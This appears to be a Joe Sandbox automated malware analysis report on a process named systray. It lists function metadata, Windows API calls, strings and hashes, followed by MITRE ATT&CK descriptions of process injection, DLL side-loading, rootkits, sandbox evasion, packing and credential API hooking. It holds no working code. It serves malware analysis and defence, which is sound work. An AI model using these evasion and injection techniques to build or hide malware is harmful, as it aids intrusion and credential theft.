Instruction Fuzzy Hash: 2FF02B763843403EE73116646C12FF77B98CF81B14F280469FA8AEB6C2C590F941C764

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A7B1 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D0F1C2,02D0F1C2,?,00000000,?,?), ref: 02D1A7F0

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 146d5d7056201c599327c081de4fb7bf43f31d08d31235cc8598b721e0cb3f52
Instruction ID: 6b56ec6c71209c7918019680efd7bea0749874c58a25e08e66213c789a849c06
Opcode Fuzzy Hash: 146d5d7056201c599327c081de4fb7bf43f31d08d31235cc8598b721e0cb3f52
Instruction Fuzzy Hash: 4EF0E5B5608240AFC710DF54D844D973BA8EF80314F00456EFC695B642C731D405CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D14526,?,02D14C9F,02D14C9F,?,02D14526,?,?,?,?,?,00000000,00000000,?), ref: 02D1A64D

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 255c720f24d8a9bfb369edafea2f58736996c5bb4a230374e54148da0c8e1a6f
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 42E012B2200208ABDB14EF99DC40EA777ADEF88664F118558BA1C5B281C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D0F1C2,02D0F1C2,?,00000000,?,?), ref: 02D1A7F0

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: d598cf3c8664a5636306b5b4d451fe7e736eea7696476d464a082d5d10c0b39f
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: DCE01AB12002086BDB10DF49DC84EE737ADEF88650F018154BA0C57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D0F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02D08D14,?), ref: 02D0F6EB

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 7160e39cdc46d455e451a8c6142044775f2dc658b253360d4fcae8af81a150d2
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 7AD05E626503043BE610BAA49C02F2632899B44B04F490064F948D73C3D954E4008565

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2C24

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0a3823ade9e2523651450298e355a1b779921e72c4977446f1e9dfbc823fa27
Instruction ID: 746429c492c33ab83f9abea5874e1eb6aafd94d7997851d8b48786f7e9df376c
Opcode Fuzzy Hash: c0a3823ade9e2523651450298e355a1b779921e72c4977446f1e9dfbc823fa27
Instruction Fuzzy Hash: 8CB09B719019C5C5FB51F7604A087177911ABD0705F16C061E3030795E473DD1D1F175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04CF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04CF293C
___swprintf_l.LIBCMT ref: 04CF295E
___swprintf_l.LIBCMT ref: 04CF29A3
___swprintf_l.LIBCMT ref: 04D2A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 04D2A54E
:%u.%u.%u.%u, xrefs: 04D2A5B8
ffff:, xrefs: 04D2A504
::%hs%u.%u.%u.%u, xrefs: 04D2A527

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b7f0382918bdbae068f7aff175de01963f899d42ffafcc9a81e5a594352018fa
Instruction ID: 32626f1a50f58025f35c7e402ac6e114134599fbb3944caa301aee1315caf1b7
Opcode Fuzzy Hash: b7f0382918bdbae068f7aff175de01963f899d42ffafcc9a81e5a594352018fa
Instruction Fuzzy Hash: C151E5B2B00156BFDB50DF989D9097FF7B9FB082047548169E5A5D7641E239FF008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04D624A6
___swprintf_l.LIBCMT ref: 04D624E2
___swprintf_l.LIBCMT ref: 04D6257D
___swprintf_l.LIBCMT ref: 04D625A3
___swprintf_l.LIBCMT ref: 04D625C8
___swprintf_l.LIBCMT ref: 04D62608

Strings

ffff:, xrefs: 04D6247D, 04D6249D
:%u.%u.%u.%u, xrefs: 04D625FF
::%hs%u.%u.%u.%u, xrefs: 04D6249E
::ffff:0:%u.%u.%u.%u, xrefs: 04D624DA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: d61f77356ec81dc121738cee6f87a90509c5e1fc1e5ab803b4cb84eb8a472a04
Instruction ID: b16d061662f3d28b8f52c579ec19e0c01e3fb4ebf0698d0960bf247ac2b59d40
Opcode Fuzzy Hash: d61f77356ec81dc121738cee6f87a90509c5e1fc1e5ab803b4cb84eb8a472a04
Instruction Fuzzy Hash: C051C775B00645AFDB30EE5CC89497FBBF9EB44304B4484AAE8D7D7681E674FA408760

Uniqueness

Uniqueness Score: -1.00%

Function 04CE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 04D24713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04D24655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04D24742
CLIENT(ntdll): Processing section info %ws..., xrefs: 04D24787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04D246FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04D24725
ExecuteOptions, xrefs: 04D246A0

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 594f8ae684fc250a0839353abb63639677041300252e701b79d995b4680015b6
Instruction ID: c02b1f2cf1ef2539058ac6149e5dd098533d0355221c0d9fad65e9d2f2207a3b
Opcode Fuzzy Hash: 594f8ae684fc250a0839353abb63639677041300252e701b79d995b4680015b6
Instruction Fuzzy Hash: 05510B31A01219BBEF11EFA5DC59FBA77AEEF14708F0400A9D505AB190EB71BE458F50

Uniqueness

Uniqueness Score: -1.00%

Function 04CFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04CFB6BF

Strings

+, xrefs: 04CFB65A
0, xrefs: 04CFB66F
-, xrefs: 04CFB650
0, xrefs: 04CFB695

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 68e8917eaccddd257b02ef5fec262f3145b10b5332e905915ff21199a45864a4
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: D381B370E456499EDF688E68CC517FEBBB3AF85350F18411ADA51A7290E73CBE40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04D620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04D6214F
___swprintf_l.LIBCMT ref: 04D62172

Strings

[, xrefs: 04D6212B
%%%u, xrefs: 04D62146
]:%u, xrefs: 04D62169

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: b11307f5e43632df9b6fd6f0b255bbc66de9283ac4593008910e9c7e8b87fcc3
Instruction ID: 35fcc40b921cbbd9cbb6f3981891259b6546364d4ca77d6f8710d1a3f008d897
Opcode Fuzzy Hash: b11307f5e43632df9b6fd6f0b255bbc66de9283ac4593008910e9c7e8b87fcc3
Instruction Fuzzy Hash: B0215E76E00119ABDB10EFA9DC50AEEBBF9FF54744F440166E906E3240E734EA019BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 04D2031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D202E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D202BD

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 6890b1410f2eeabd3abb6a38d23b5ab05a8cff079533c28309270772eb85cc3a
Instruction ID: 6cd8dac13bfccd3f256b96920c68c5a991c5ecbad0e929bf48966898e9a0d466
Opcode Fuzzy Hash: 6890b1410f2eeabd3abb6a38d23b5ab05a8cff079533c28309270772eb85cc3a
Instruction Fuzzy Hash: A0E1C0306047419FD725CF28C984B6AB7E2BF89318F140A6DF6968B2E0E774F945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04CEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 04D27B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04D27B7F
RTL: Re-Waiting, xrefs: 04D27BAC

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 8f897e22bbe7a788e277463b9b2bc699452c2d06081267f338e8c495750076ac
Instruction ID: 7b31cc69c0dbcd525efcad20a629b01e3b9596bf99a99bb2b8c24cbcef2f1d2c
Opcode Fuzzy Hash: 8f897e22bbe7a788e277463b9b2bc699452c2d06081267f338e8c495750076ac
Instruction Fuzzy Hash: 6141E1357017029FDB24DE26C940B7AB7E6EF88715F100A2DF95ADB680EB31F9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 04CEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D2728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04D27294
RTL: Resource at %p, xrefs: 04D272A3
RTL: Re-Waiting, xrefs: 04D272C1

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: b9e7afbf0de9699574f3da7aac93a69e16861f08096deab8793f3658b76d6f34
Instruction ID: 361b804ebfb236c891a74e3f7e59b2c439d7cccf6c0bb874f13b2cb482606969
Opcode Fuzzy Hash: b9e7afbf0de9699574f3da7aac93a69e16861f08096deab8793f3658b76d6f34
Instruction Fuzzy Hash: 26411031700216ABD721DE26CD41B76B7A6FF94718F140619F955EB240EB31F8528BE0

Uniqueness

Uniqueness Score: -1.00%

Function 04D62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04D6238D
___swprintf_l.LIBCMT ref: 04D623B3

Strings

]:%u, xrefs: 04D623AA
%%%u, xrefs: 04D62384

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 7b8d8c6a6ac7e0840d7c0908729ff7c720d8959f6cacf1a4c9a3ab313f115ae8
Instruction ID: 99bf44b10d5b47880d39e3feb6a7cccaaf4ef775b74f4d3689cb168f6a49fc2f
Opcode Fuzzy Hash: 7b8d8c6a6ac7e0840d7c0908729ff7c720d8959f6cacf1a4c9a3ab313f115ae8
Instruction Fuzzy Hash: 4E318472A002199FDF20EE2CDC40BEE77B8FB44714F44459AE849E3240EB30FA548BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04CF7E8B

Strings

-, xrefs: 04CF7DDD
+, xrefs: 04CF7DE8

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: d48d07ec43f471946687602c982f9e7530035692ea144806b130697ce690ec96
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 0E91A570E012169FDFA4DF69CC81ABEB7A7EF44320F54451AEA55E72C0E738AA418760

Uniqueness

Uniqueness Score: -1.00%

Function 04CB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 04CB9191
@, xrefs: 04CB9175

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 6bebc1e08cf63b47d8a3d72a6b18f7f1bb58afba14abba2b863a9439a7966b07
Instruction ID: c7d098e7c79b934672d80e24191ec04ad6cf5d47659718b078caf8eb044180d8
Opcode Fuzzy Hash: 6bebc1e08cf63b47d8a3d72a6b18f7f1bb58afba14abba2b863a9439a7966b07
Instruction Fuzzy Hash: D1812CB5D002699BDB31CB54CC44BEEB7B5AF08714F0041DAEA19B7290E731AE84DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D3CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 04D3CFBD

Strings

@4Qw@4Qw, xrefs: 04D3CFD5, 04D3CFDA, 04D3CFF1
@, xrefs: 04D3CF0A

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: 0640d6ce9bfe71d433ef1014b0dddccf6c5d4a114edca1d333d345a73055650d
Instruction ID: 2d90f424f8c205c9a200b99d603f1afe4a5b8f0845e958b60204de5e427aa5b2
Opcode Fuzzy Hash: 0640d6ce9bfe71d433ef1014b0dddccf6c5d4a114edca1d333d345a73055650d
Instruction Fuzzy Hash: 7741AD72E00224DFDB21DFA5D840AAEBBBAFF44B04F00402AE955EB260D774E805DF60

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

